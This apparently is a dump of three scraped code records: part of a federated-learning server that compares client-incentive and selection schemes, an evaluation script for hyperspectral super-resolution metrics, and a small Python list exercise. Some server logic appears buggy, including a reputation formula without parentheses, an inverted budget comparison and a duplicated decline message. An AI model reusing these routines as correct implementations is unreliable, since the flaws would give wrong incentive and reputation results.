(self.client_rep_list[key][0] >= self.rep_threshold):\n sampled_client_indices.append(key)\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), max(self.hired_px_hist)])\n total_asking_price += self.clients[key].get_asking_price() \n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n sv = calculate_sv(sampled_client_indices, self.client_rep_list)\n #incentive based on contribution value\n temp_budget= sum(sv.values())*0.5*total_asking_price\n #normalize it such that it can be compared to other methods, x-xmin / xmax-xmin, xmin = 0.8 xmax =3\n self.used_PR_budget = (temp_budget-0.8) / 2.2\n elif self.incentive_type == \"Greedy\":\n #greedy only hires the lower 25% price of clients\n count = 0\n asking_px_arr = []\n for key in (client_visit_arr):\n asking_px_arr.append(self.clients[key].get_asking_price())\n cut_off_price = np.percentile(asking_px_arr, 15)\n for key in (client_visit_arr):\n #Check budget balance and reputation\n asking_px= self.clients[key].get_asking_price() \n # print(f'client {key} has price of {asking_px}') 24 is 40% of 60\n if(key in self.client_rep_list.keys() and count < 9):\n if (asking_px <= cut_off_price):\n self.used_PR_budget += asking_px\n #reply to clients\n self.hired_px_hist.append(asking_px)\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), max(self.hired_px_hist)])\n count += 1\n sampled_client_indices.append(key)\n else: \n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n elif self.incentive_type == \"FIFL\":\n #incentive based on update gradient\n for key in (client_visit_arr):\n self.clients[key].set_algo_type(\"FIFL\")\n curr_grad = self.clients[key].get_grad() \n #Check budget balance and reputation \n if(key in self.client_rep_list.keys()):\n if (self.client_rep_list[key][0] >= self.rep_threshold):\n incentive_px = calculate_reward(self.client_rep_list[key][0], 2, curr_grad, self.global_grad, client_visit_arr, self.clients)\n self.used_PR_budget += incentive_px\n #reply to clients\n self.hired_px_hist.append(incentive_px)\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), max(self.hired_px_hist)])\n sampled_client_indices.append(key)\n else: \n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n elif self.incentive_type == \"UCB\":\n #incentive based on update gradient\n for key in (client_visit_arr):\n self.clients[key].set_algo_type(\"UCB\") \n num_selected = self.clients[key].get_num_selected()\n #calculate UCB \n #Check budget balance and UCB \n if(key in self.client_rep_list.keys()):\n if (self.client_rep_list[key][0] >= self.rep_threshold):\n #calculate UCB \n #############################\n incentive_px = self.clients[key].get_price()\n #check if budget allow\n if (self.used_PR_budget + incentive_px ) <= self.basic_PR_budget: \n #reply to clients\n self.hired_px_hist.append(incentive_px)\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), max(self.hired_px_hist)])\n sampled_client_indices.append(key)\n else: \n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n elif self.incentive_type == \"RRAFL\":\n #get unit reputation bid \n rep_bid_dict = {}\n for key in (client_visit_arr):\n if(key in clients_bids.keys()):\n self.clients[key].set_algo_type(\"RRAFL\")\n asking_px = self.clients[key].get_asking_price()\n q_client = asking_px/self.client_rep_list[key][0]\n rep_bid_dict[key] = q_client\n # sort by value\n sorted_rep_bid_list= sorted(rep_bid_dict.items(), key=lambda x:x[1])\n #convert to dict\n sorted_rep_bid_dict = dict(sorted_rep_bid_list)\n\n #find the selected group, all temp variables\n for key in (sorted_rep_bid_dict.keys()): \n if key+1 >= len(sorted_rep_bid_dict):\n q_client_next = self.clients[key].get_asking_price() / self.client_rep_list[key][0]\n else:\n #use next unit price \n q_client_next = self.clients[key+1].get_asking_price() / self.client_rep_list[key][0]\n incentive_px = self.client_rep_list[key][0] * q_client_next + self.exe_cost_per_client\n if(self.used_PR_budget + incentive_px <= self.PR_budget):\n self.used_PR_budget = self.used_PR_budget + incentive_px\n #bookeeping\n sampled_client_indices.append(key)\n self.hired_px_hist.append(incentive_px)\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), min(self.hired_px_hist)])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), min(self.hired_px_hist)])\n elif self.incentive_type == \"Uniform\":\n for key in (client_visit_arr):\n #Check budget balance and reputation\n asking_px= self.clients[key].get_asking_price() \n # print(f'client {key} has price of {asking_px}')\n if(key in self.client_rep_list.keys()):\n if (self.client_rep_list[key][0] >= self.rep_threshold):\n self.used_PR_budget += asking_px\n #reply to clients\n self.hired_px_hist.append(asking_px) \n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), max(self.hired_px_hist)])\n sampled_client_indices.append(key)\n else: \n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n elif self.incentive_type == \"Vanilla\": #vanilla reverse auction\n min_bid = min(clients_bids, key=clients_bids.get)\n for key in (client_visit_arr):\n #first come first serve if many low bidders, don't want to starve if only pick high rep\n if(key in clients_bids.keys()):\n asking_px = self.clients[key].get_asking_price()\n #if pariticpant has the lowest bid and budget allows\n incentive_px = asking_px + self.exe_cost_per_client\n if (asking_px == clients_bids[min_bid]) and ( (self.used_PR_budget + incentive_px ) <= self.basic_PR_budget) : \n self.hired_px_hist.append(asking_px) \n self.used_PR_budget += incentive_px\n if len(self.hired_px_hist) == 0:\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), 3])\n else:\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), min(self.hired_px_hist)])\n sampled_client_indices.append(key)\n #reject participant\n else:\n #no previous participants\n if len(self.hired_px_hist) == 0:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), 3])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), min(self.hired_px_hist)])\n #normal reverse auction with no boosted income, select only the cheapest participants \n elif self.incentive_type == \"Reverse\":\n min_bid = min(clients_bids, key=clients_bids.get)\n print(\"min bid is \", clients_bids[min_bid])\n for key in (client_visit_arr):\n #first come first serve if many low bidders, don't want to starve if only pick high rep\n if(key in clients_bids.keys()):\n asking_px = self.clients[key].get_asking_price()\n #if pariticpant has the lowest bid and budget allows\n incentive_px = asking_px + self.exe_cost_per_client\n if (asking_px == clients_bids[min_bid]) and ( (self.used_PR_budget + incentive_px ) <= self.basic_PR_budget) : \n self.hired_px_hist.append(asking_px) \n self.used_PR_budget += incentive_px\n if len(self.hired_px_hist) == 0:\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), 3])\n else:\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), min(self.hired_px_hist)])\n sampled_client_indices.append(key)\n #reject participant\n else:\n #no previous participants\n if len(self.hired_px_hist) == 0:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), 3])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), min(self.hired_px_hist)])\n #reverse auction mechanism but federation have more expenditure budget\n elif self.incentive_type == \"ReverseMod\":\n #shortcut to optimize code\n if self.hire_budget <= 0:\n sampled_client_indices = []\n return sampled_client_indices\n for key in (client_visit_arr):\n if(key in clients_bids.keys()):\n asking_px = self.clients[key].get_asking_price() \n incentive_px = asking_px + self.exe_cost_per_client\n if(key in self.client_rep_list.keys()):\n if (self.hire_budget -incentive_px >= 0) and (self.client_rep_list[key][0] >= self.rep_threshold) : \n self.hired_px_hist.append(asking_px) \n self.hire_budget = self.hire_budget - incentive_px\n # for bookkepping of values\n self.used_PR_budget = self.used_PR_budget + asking_px + self.exe_cost_per_client\n if len(self.hired_px_hist) == 0:\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), 3])\n else:\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), min(self.hired_px_hist)])\n sampled_client_indices.append(key)\n else:\n if len(self.hired_px_hist) == 0:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), 3])\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), min(self.hired_px_hist)])\n elif self.incentive_type == \"oort\": \n #Select clients with pacer, the function takes care of the 2 exploitation method and the exploration by speed\n sampled_client_indices = self.oort_train_selector.select_participant(len(client_visit_arr))\n total_per_round_asking_price = 0\n for client_idx in client_visit_arr:\n if client_idx in sampled_client_indices:\n #the price dont actually matter here. just need to send the message, and keep track for comparison\n self.clients[client_idx].send_message([\"Accept\", self.cal_avg_price(), max(self.hired_px_hist)])\n else:\n self.clients[client_idx].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n total_per_round_asking_price += self.clients[client_idx].get_asking_price() \n \n self.used_PR_budget += total_per_round_asking_price\n else:\n for key in (client_visit_arr):\n #Check budget balance and reputation\n asking_px= self.clients[key].get_asking_price() \n # print(f'client {key} has price of {asking_px}')\n if(key in self.client_rep_list.keys()):\n if (self.used_PR_budget + asking_px >= self.PR_budget) and (self.client_rep_list[key][0] >= self.rep_threshold):\n self.used_PR_budget += asking_px\n #reply to clients\n self.hired_px_hist.append(asking_px)\n self.clients[key].send_message([\"Accept\", self.cal_avg_price(), max(self.hired_px_hist)])\n sampled_client_indices.append(key)\n else: \n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n else:\n self.clients[key].send_message([\"Decline\", self.cal_avg_price(), max(self.hired_px_hist)])\n #cold start, not needed in new algorithm\n else:\n # sample clients randommly because don't know who are the clients i.e. cold start problem, note: these clients will be addeed during evaluation stage to rep list\n sampled_client_indices = sorted(np.random.choice(a=[i for i in range(self.num_clients)], size=int(num_sampled_clients*self.fraction), replace=False).tolist())\n for idx in sampled_client_indices:\n self.hired_px_hist.append(self.clients[idx].get_asking_price())\n \n return sampled_client_indices\n \n \n \"\"\"Step 2: Selected Client starts training\"\"\"\n def update_selected_clients(self, sampled_client_indices):\n \n # update selected clients\n message = f\"[Round: {str(self._round).zfill(4)}] Start updating selected {len(sampled_client_indices)} clients...!\"\n print(message); logging.info(message)\n del message; gc.collect()\n\n selected_total_size = 0\n for idx in tqdm(sampled_client_indices, leave=False):\n self.clients[idx].client_update()\n selected_total_size += len(self.clients[idx])\n\n message = f\"[Round: {str(self._round).zfill(4)}] ...{len(sampled_client_indices)} clients are selected and updated (with total sample size: {str(selected_total_size)})!\"\n print(message); logging.info(message)\n del message; gc.collect()\n\n return selected_total_size\n \n \"\"\"Step 3: Evaluate the clients and update their reputation\"\"\"\n def evaluate_selected_models(self, sampled_client_indices):\n \"\"\"Call \"client_evaluate\" function of each selected client.\"\"\"\n message = f\"[Round: {str(self._round).zfill(4)}] Evaluate selected {str(len(sampled_client_indices))} clients' models...!\"\n print(message); logging.info(message)\n del message; gc.collect()\n \n #update their reputation and most recent performance\n if self.incentive_type == 'oort':\n #update and clip feedback and blacklist outliers\n for client_id in sampled_client_indices:\n test_loss, test_accuracy = self.clients[client_id].client_evaluate()\n #count will be added in update function\n feedbacks = {'reward': test_accuracy, 'duration':self.clients[client_id].get_time_taken(), 'time_stamp':self._round, 'count': self.clients[client_id].get_num_selected(), 'status': True}\n self.oort_train_selector.update_client_util(client_id, feedbacks)\n else:\n for idx in sampled_client_indices:\n test_loss, test_accuracy = self.clients[idx].client_evaluate()\n if self.incentive_type == \"RRAFL\" and self._round >= 3:\n self.update_select_client_rep_RRAFL(idx, test_accuracy)\n #else use normal rep update\n self.update_select_client_rep(idx,test_accuracy)\n #update average reputation value of selected clients\n self.avg_rep = sum([self.client_rep_list[idx][0] for idx in sampled_client_indices])/len(sampled_client_indices)\n\n message = f\"[Round: {str(self._round).zfill(4)}] ...finished evaluation of {str(len(sampled_client_indices))} selected clients!\"\n print(message); logging.info(message)\n del message; gc.collect()\n\n \"\"\"Update reputation based on BRS\"\"\"\n def update_select_client_rep(self, idx, test_accuracy ):\n if idx not in self.client_rep_list:\n #[reputation value, alpha, beta, acc] \n self.client_rep_list[idx] = [0.5, 0 , 0 , test_accuracy]\n return\n\n if test_accuracy > self.client_rep_list[idx][3]:\n self.client_rep_list[idx][1] += (2**(self.num_rounds-self._round)) * 1\n else: \n self.client_rep_list[idx][2] += (2**(self.num_rounds-self._round)) * 1\n\n new_rep = (self.client_rep_list[idx][1] + 1) / (self.client_rep_list[idx][2] + self.client_rep_list[idx][1] + 2) \n self.client_rep_list[idx][0] = new_rep\n self.client_rep_list[idx][3] = test_accuracy\n \n def update_select_client_rep_RRAFL(self, idx, test_accuracy):\n #Do contribution measurement first\n curr_grad = self.clients[idx].get_grad() \n client_contrib = calculate_client_contrib(curr_grad, self.global_grad)\n self.clients[idx].update_contrib_list(client_contrib)\n max_contrib = max(self.clients[idx].get_contrib_list())\n z = max(0.001, client_contrib) / max_contrib\n #calculate if client should get selected or not, with loss threshold = -0.01 as set in the paper\n if self.client_rep_list[idx][3] - test_accuracy >= -0.01:\n self.clients[idx].inc_num_pass()\n else:\n self.clients[idx].inc_num_fail()\n #gomertz function for incentive calculation\n x = (0.4* self.clients[idx].get_num_pass())-(0.6*self.clients[idx].get_num_fail()) / (0.4* self.clients[idx].get_num_pass())+(0.6*self.clients[idx].get_num_fail())\n y = math.pow(math.e, -1*math.pow(math.e, -5.5*x))\n new_rep = y*z\n\n self.client_rep_list[idx][0] = new_rep\n\n \n #-----------------UTILITY FUNCTIONS----------------------------\n def cal_avg_price(self, rounds=None):\n if len(self.hired_px_hist) == 0:\n return 0\n if rounds == None:\n return (sum(self.hired_px_hist)/len(self.hired_px_hist))\n else:\n return (sum(self.hired_px_hist[:-1])/(len(self.hired_px_hist)-1))\n\n def calculate_utility(self, acc):\n utility = (self.multiplier_g * acc * 100)-self.used_PR_budget\n return utility\n \n #call this action every round to update per round budget\n def set_budget(self):\n self.PR_used_budget_hist.append(self.used_PR_budget)\n print(f\"per round used budget {self.used_PR_budget}\")\n #set incentive type\n if (self._Q) > 0 :\n self.incentive_type = \"ReverseMod\"\n # if self.l2norm != 0:\n remaining_budget = self.PR_budget - self.used_PR_budget\n print(f\"remaining budget {remaining_budget}\")\n self.PR_budget = remaining_budget + self.basic_PR_budget\n self.hire_budget = (self._Q)+(self.opt_bid)-(self._V)\n #Put a cap on hire budget, cannot be more than Per round budget\n if self.hire_budget > self.PR_budget:\n self.hire_budget = self.PR_budget\n if self.hire_budget < 0:\n self.hire_budget = 0\n print(f'hire budget for round {self._round} is {self.hire_budget}')\n else:\n self.incentive_type = \"Reverse\"\n remaining_budget = self.PR_budget-self.used_PR_budget\n print(f\"remaining budget {remaining_budget}\")\n self.PR_budget = remaining_budget + self.basic_PR_budget\n print(f'per round budget for round {self._round} is {self.PR_budget}')\n \n def get_optimal_bid(self, clients_bids):\n temp = 0\n for key in clients_bids:\n if key in self.client_rep_list.keys():\n if self.client_rep_list[key][0] >= self.rep_threshold:\n temp += clients_bids[key]\n return temp\n\n \n def set_overall_l2norm(self, l2norm):\n self.l2norm = l2norm\n\n def get_PR_budget_hist(self):\n return self.PR_used_budget_hist\n\n def get_results(self):\n return self.results\n \n def get_Q_hist(self):\n return self._Q_hist\n\n def calculate_Q(self, acc):\n utility = self.calculate_utility(acc)\n self.utility_history.append(utility)\n print(f\"Utility {utility}\")\n \n optimal_improvement_threshold = get_optimal_improvement_threshold(self._round)\n if self._round >= 1:\n actual_improvement = acc - self.results['accuracy'][self._round-1]\n else:\n actual_improvement = 0\n print(f\"optimal improvement is {optimal_improvement_threshold} while current rate is {actual_improvement}\")\n if (actual_improvement <= optimal_improvement_threshold ):\n self._Q = max(0, self._Q + self.opt_bid - self.used_PR_budget)\n else:\n self._Q = max(0, self._Q - self.used_PR_budget)\n print(f'Result Q = {self._Q}')\n self._Q_hist.append(self._Q)\n \n def get_q_square(self):\n q_f_2 = self._Q * self._Q \n return q_f_2\n\n def save_model(self):\n PATH = os.getcwd()\n PATHNAME = os.path.join(PATH,'model.pth')\n torch.save(self.model, PATHNAME)\n \n def get_Q(self):\n return self._Q\n\n def get_utility_history(self):\n return self.utility_history\n \n def calculate_client_jfi(self):\n jfi = calculate_JFI_clients(self.clients, self.client_rep_list)\n print(f\"JFI for {self.incentive_type} is {jfi}\")\n \n def prune_client_tasks(self, clientSampler, sampledClientsRealTemp, numToRealRun, global_virtual_clock):\n\n sampledClientsReal = []\n # 1. remove dummy clients that are not available to the end of training\n for virtualClient in sampledClientsRealTemp:\n roundDuration = clientSampler.getCompletionTime(virtualClient,\n batch_size=self.batch_size, upload_epoch=self.local_epochs,\n model_size=65556) * self.clock_factor\n\n if clientSampler.isClientActive(virtualClient, roundDuration + global_virtual_clock):\n sampledClientsReal.append(virtualClient)\n\n # 2. we decide to simulate the wall time and remove 1. stragglers 2. off-line\n completionTimes = []\n virtual_client_clock = {}\n for virtualClient in sampledClientsReal:\n roundDuration = clientSampler.getCompletionTime(virtualClient,\n batch_size=self.batch_size, upload_epoch=self.upload_epoch,\n model_size=self.model_size) * self.clock_factor\n completionTimes.append(roundDuration)\n virtual_client_clock[virtualClient] = roundDuration\n\n # 3. get the top-k completions\n sortedWorkersByCompletion = sorted(range(len(completionTimes)), key=lambda k:completionTimes[k])\n top_k_index = sortedWorkersByCompletion[:numToRealRun]\n clients_to_run = [sampledClientsReal[k] for k in top_k_index]\n\n dummy_clients = [sampledClientsReal[k] for k in sortedWorkersByCompletion[numToRealRun:]]\n round_duration = completionTimes[top_k_index[-1]]\n \n return clients_to_run, dummy_clients, virtual_client_clock, round_duration\n\n \n #---------------------MAIN SERVER FUNCTIONS-------------------------\n #-------------------MODEL RELATED FUNCTIONS-------------------------\n def transmit_model(self, sampled_client_indices=None):\n \"\"\"Send the updated global model to selected/all clients.\"\"\"\n if sampled_client_indices is None:\n # send the global model to all clients before the very first and after the last federated round\n for client in tqdm(self.clients, leave=False):\n client.model = copy.deepcopy(self.model)\n\n message = f\"[Round: {str(self._round).zfill(4)}] ...successfully transmitted models to all {str(len(self.clients))} clients!\"\n print(message); logging.info(message)\n del message; gc.collect()\n else:\n # send the global model to selected clients\n # assert self._round != 0\n\n for idx in tqdm(sampled_client_indices, leave=False):\n self.clients[idx].model = copy.deepcopy(self.model)\n \n message = f\"[Round: {str(self._round).zfill(4)}] ...successfully transmitted models to {str(len(sampled_client_indices))} selected clients!\"\n print(message); logging.info(message)\n del message; gc.collect()\n\n\n def average_model(self, sampled_client_indices, coefficients):\n \"\"\"Average the updated and transmitted parameters from each selected client.\"\"\"\n message = f\"[Round: {str(self._round).zfill(4)}] Aggregate updated weights of {len(sampled_client_indices)} clients...!\"\n print(message); logging.info(message)\n del message; gc.collect()\n all_client_grad = []\n averaged_weights = OrderedDict()\n for it, idx in tqdm(enumerate(sampled_client_indices), leave=False):\n local_weights = self.clients[idx].model.state_dict()\n if self.incentive_type == \"FIFL\":\n all_client_grad.append(self.clients[idx].get_grad())\n #time sensitive\n if self.incentive_type == \"Reverse\" or self.incentive_type == \"ReverseMod\":\n time_taken_client = self.clients[idx].get_time_taken()\n if time_taken_client > self.time_required:\n #get back the money spent\n self.used_PR_budget -= self.clients[idx].get_asking_price()\n #skip aggregating for this client if too slow\n continue\n for key in self.model.state_dict().keys():\n if it == 0:\n averaged_weights[key] = coefficients[it] * local_weights[key]\n else:\n averaged_weights[key] += coefficients[it] * local_weights[key]\n self.model.load_state_dict(averaged_weights, strict=False)\n if self.incentive_type == \"FIFL\":\n self.global_grad = np.mean(all_client_grad)\n print(f\"gradient of server is {self.global_grad}\")\n message = f\"[Round: {str(self._round).zfill(4)}] ...updated weights of {len(sampled_client_indices)} clients are successfully averaged!\"\n print(message); logging.info(message)\n del message; gc.collect() \n\n def evaluate_global_model(self):\n \"\"\"Evaluate the global model using the global holdout dataset (self.data).\"\"\"\n self.model.eval()\n self.model.to(self.device, non_blocking=True)\n\n test_loss, correct = 0, 0\n with torch.no_grad():\n for data, labels in self.dataloader:\n data, labels = data.float().to(self.device, non_blocking=True), labels.long().to(self.device, non_blocking=True)\n outputs = self.model(data)\n test_loss += eval(self.criterion)()(outputs, labels).item()\n \n predicted = outputs.argmax(dim=1, keepdim=True)\n correct += predicted.eq(labels.view_as(predicted)).sum().item()\n \n if self.device == \"cuda\": torch.cuda.empty_cache()\n # self.model.to(\"cpu\")\n \n test_loss = test_loss / len(self.dataloader)\n test_accuracy = correct / len(self.data)\n return test_loss, test_accuracy\n \n def train_federated_model(self, client_visit_arr, clients_bids):\n \"\"\"Do federated training.\"\"\"\n #reset PR budget\n self.used_PR_budget = 0\n \n \n sampled_client_indices = self.sample_clients(client_visit_arr, clients_bids) \n self.hire_count_now = len(sampled_client_indices)\n\n\n print(f'id of selected clients: {sampled_client_indices}')\n #Clients can choose to accept or not\n \n # send global model to the selected clients, \\omega_n^t = \\omega_m^t\n self.transmit_model(sampled_client_indices)\n \n if len(sampled_client_indices) == 0:\n return sampled_client_indices\n\n # train and update model for selected clients with local dataset\n selected_total_size = self.update_selected_clients(sampled_client_indices)\n\n # evaluate selected clients with local dataset (same as the one used for local update)\n self.evaluate_selected_models(sampled_client_indices)\n\n # print(self.client_rep_list)\n\n # calculate averaging coefficient of weights\n mixing_coefficients = [len(self.clients[idx]) / selected_total_size for idx in sampled_client_indices]\n\n # average each updated model parameters of the selected clients and update the global model\n self.average_model(sampled_client_indices, mixing_coefficients)\n\n #free the client after training\n for idx in sampled_client_indices:\n self.clients[idx].set_available()\n \n \n \n def fit(self, r, client_visit_arr, clients_bids):\n \"\"\"Execute the whole process of the federated learning.\"\"\"\n\n self._round = r \n # self.total_bid = sum(clients_bids.values())\n # print(\"total bid is\"+ str(self.total_bid))\n\n self.opt_bid = self.get_optimal_bid(clients_bids)\n print(\"optimal bid is\"+ str(self.opt_bid))\n\n self.train_federated_model(client_visit_arr, clients_bids)\n test_loss, test_accuracy = self.evaluate_global_model()\n\n \n self.results['loss'].append(test_loss)\n self.results['accuracy'].append(test_accuracy)\n \n self.writer.add_scalars(\n 'Loss',\n {f\"[{self.dataset_name}]_{self.model.name} C_{self.fraction}, E_{self.local_epochs}, B_{self.batch_size}, IID_{self.iid}\": test_loss},\n self._round\n )\n self.writer.add_scalars(\n 'Accuracy', \n {f\"[{self.dataset_name}]_{self.model.name} C_{self.fraction}, E_{self.local_epochs}, B_{self.batch_size}, IID_{self.iid}\": test_accuracy},\n self._round\n )\n\n message = f\"[Round: {str(self._round).zfill(4)}] Evaluate global model's performance...!\\\n \\n\\t[Server: {str(self.id) }] ...finished evaluation!\\\n \\n\\t=> Loss: {test_loss:.4f}\\\n \\n\\t=> Accuracy: {100. * test_accuracy:.2f}%\\n\" \n print(message); logging.info(message)\n del message; gc.collect()\n \n self.transmit_model()\n #Calculate Q and Calculate the utility yield\n self.calculate_Q(test_accuracy)\n #ONLY FOR GPSS-ALGO\n if self.incentive_type == \"Reverse\" or self.incentive_type == \"ReverseMod\":\n self.set_budget()\n else:\n self.PR_used_budget_hist.append(self.used_PR_budget)\n print(f'PR_budget for Fed {self.id} is {self.PR_budget}')\n \n \n ","repo_name":"xavi0007/FedLearning-oort","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":41964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"43362144427","text":"\nimport os\nimport datetime\nimport torch\nimport matplotlib.pyplot as plt\nimport multiprocessing\nimport psutil\nimport numpy as np\nfrom PIL import Image\nimport sys\nimport getopt\nfrom network_31 import VSR_CAS\n# from dataset_tst import ImageFolder\n#from torch.utils.tensorboard import SummaryWriter\nfrom collections import OrderedDict\nfrom util import rgb2ycbcr\nimport math\nimport os\nimport scipy.io as sio\nfrom clean_util import para_setting\nfrom scipy.io import loadmat,savemat\nfrom skimage.measure import compare_ssim\n# from util import PSNR\n#########################################################\nchannel = 31\nup_factor = 8\npatch_size = 512\ndelta =3\n#########################################################\n# --------------------------------------------------------------\ndata = sio.loadmat('../data/train/NSSR_P')\nP = data['P']\nP = torch.FloatTensor(P)\nfft_B,fft_BT = para_setting('gaussian_blur',up_factor,[512, 512],delta=delta)\nfft_B = torch.cat( (torch.Tensor(np.real(fft_B)).unsqueeze(2), torch.Tensor(np.imag(fft_B)).unsqueeze(2)) ,2 )\nfft_BT = torch.cat( (torch.Tensor(np.real(fft_BT)).unsqueeze(2), torch.Tensor(np.imag(fft_BT)).unsqueeze(2)) ,2 )\n# --------------------------------------------------------------\ndef convert_to_common_model(state_dict):\n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n if 'module' in k:\n name = k[7:]\n else:\n name = k\n new_state_dict[name] = v\n return new_state_dict\n\npretrained = torch.load('./models/eopch_100500_params.pkl')\nvsr = torch.nn.DataParallel(VSR_CAS(channel0=channel , factor=up_factor , P=P ,patch_size =patch_size ).cuda())\nvsr.load_state_dict(pretrained)\n# test data dir\nLR_dir = './data/CAVE/test/LR_8_gaussian_'+str(delta)\nHR_dir = './data/CAVE/test/HSI'\nRGB_dir = './data/CAVE/test/RGB'\n\ndef PSNR(img1, img2):\n mse_sum = (img1 - img2 ).pow(2)\n mse_loss = mse_sum.mean(2).mean(2) \n mse = mse_sum.mean() #.pow(2).mean()\n if mse < 1.0e-10:\n return 100\n PIXEL_MAX = 1\n # print(mse)\n return mse_loss, 20 * math.log10(PIXEL_MAX / math.sqrt(mse))\ndef compute_sam(im1, im2):\n im1 = np.reshape(im1,(512*512,31))\n im2 = np.reshape(im2,(512*512,31))\n mole = np.sum(np.multiply(im1, im2), axis=1) \n im1_norm = np.sqrt(np.sum(np.square(im1), axis=1))\n im2_norm = np.sqrt(np.sum(np.square(im2), axis=1))\n deno = np.multiply(im1_norm, im2_norm)\n sam = np.rad2deg(np.arccos(((mole+10e-8)/(deno+10e-8)).clip(-1,1)))\n return np.mean(sam)\n\ndef compute_ssim(im1,im2): \n im1 = np.reshape(im1, (512,512,31))\n im2 = np.reshape(im2, (512,512,31))\n n = im1.shape[2]\n ms_ssim = 0.0\n for i in range(n):\n single_ssim = compare_ssim(im1[:,:,i], im2[:,:,i])\n ms_ssim += single_ssim\n return ms_ssim/n\n\ndef compute_ergas(mse, out):\n out = np.reshape(out, (512*512,31))\n out_mean = np.mean(out, axis=0)\n mse = np.reshape(mse, (31, 1))\n out_mean = np.reshape(out_mean, (31, 1))\n ergas = 100/8*np.sqrt(np.mean(mse/out_mean**2)) \n return ergas\n\nimgs = os.listdir(LR_dir)\npsnrs = []\nssims =[]\nsams = []\nergass =[]\npad_LR = torch.nn.ZeroPad2d(1)\npad_RGB = torch.nn.ZeroPad2d(32)\nwith torch.no_grad():\n print('=========={}======'.format(len(imgs)))\n for i in range(len(imgs)):\n \n LR = loadmat(os.path.join(LR_dir,imgs[i]))\n LR = torch.FloatTensor(LR['lr']).cuda()\n # LR = pad_LR(LR)\n HR = loadmat(os.path.join(HR_dir, imgs[i]))\n HR = torch.FloatTensor(HR['hsi']).permute(2,0,1).unsqueeze(0).cuda()\n # HR = pad_RGB(HR)\n RGB = loadmat(os.path.join(RGB_dir, imgs[i]))\n RGB = torch.FloatTensor(RGB['rgb']).permute(2, 0, 1).unsqueeze(0).cuda()\n \n res = vsr(LR, RGB)\n res = torch.clamp(res, 0, 1)\n mse, psnr = PSNR(res, HR)\n psnrs.append(psnr)\n res = np.array(res.cpu())\n \n HR = np.array(HR.cpu())\n mse = np.array(mse.cpu())\n sam = compute_sam(res, HR)\n ssim = compute_ssim(res, HR)\n ergas = compute_ergas(mse, HR)\n sams.append(sam)\n ssims.append(ssim)\n ergass.append(ergas)\n fp = open('./quality.txt', 'a')\n fp.write(imgs[i] +'\\t'+ 'PSNR' +'\\t' + 'SAM' +'\\t' + 'SSIM' +'\\t'+ 'ERGAS'+ '\\t' +\n str(psnr) +'\\t' +str(sam)+'\\t'+str(ssim)+'\\t'+str(ergas)+'\\n')\n fp.close()\n print('Image:%s >>> psnr :%f , sam : %f ,ssim : %f , ,ergas : %f'%(imgs[i],psnr,sam,ssim,ergas))\n\n save_path = './results0615/' + 'delta_' + str(delta) + '/' + imgs[i]\n if not os.path.exists('./results0615/' + 'delta_' + str(delta)):\n os.makedirs('./results0615/' + 'delta_' + str(delta))\n savemat(save_path, {'res': res})\n\n\n\n psnrw_mean = sum(psnrs)/len(psnrs)\n sam_mean = sum(sams)/len(sams)\n ssim_mean = sum(ssims)/len(ssims)\n ergas_mean = sum(ergass)/len(ergass)\n print('The mean psnr, sam ,ssim, ergas is %f, %f, %f, %f'%(psnrw_mean,sam_mean,ssim_mean,ergas_mean))\n fp=open('./quality.txt','a')\n fp.write('PSNR_mean' +'\\t'+ 'SAM_mean' +'\\t' + 'SSIM_mean' +'\\t' + 'ERGAS_mean' +\n '\\t' + str(psnrw_mean) + '\\t' + str(sam_mean) +'\\t' + str(ssim_mean) +'\\t'+ str(ergas_mean) + '\\n')\n\n fp.close()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"chengerr/Model-Guided-Deep-Hyperspectral-Image-Super-resolution","sub_path":"sf_8_CAVE/tst.py","file_name":"tst.py","file_ext":"py","file_size_in_byte":5322,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"33"} +{"seq_id":"24253255903","text":"import os\n\nclear = lambda: os.system('cls')\nclear()\n\nvetor = []\n\nfor i in range(10):\n num = int(input('Insira um número: '))\n if num < 0:\n vetor.append(0)\n else:\n vetor.append(num)\n\nprint(vetor)\n","repo_name":"marcelopontes1/Estudos-Python-GUPPE","sub_path":"S7/decimo_setimo.py","file_name":"decimo_setimo.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} 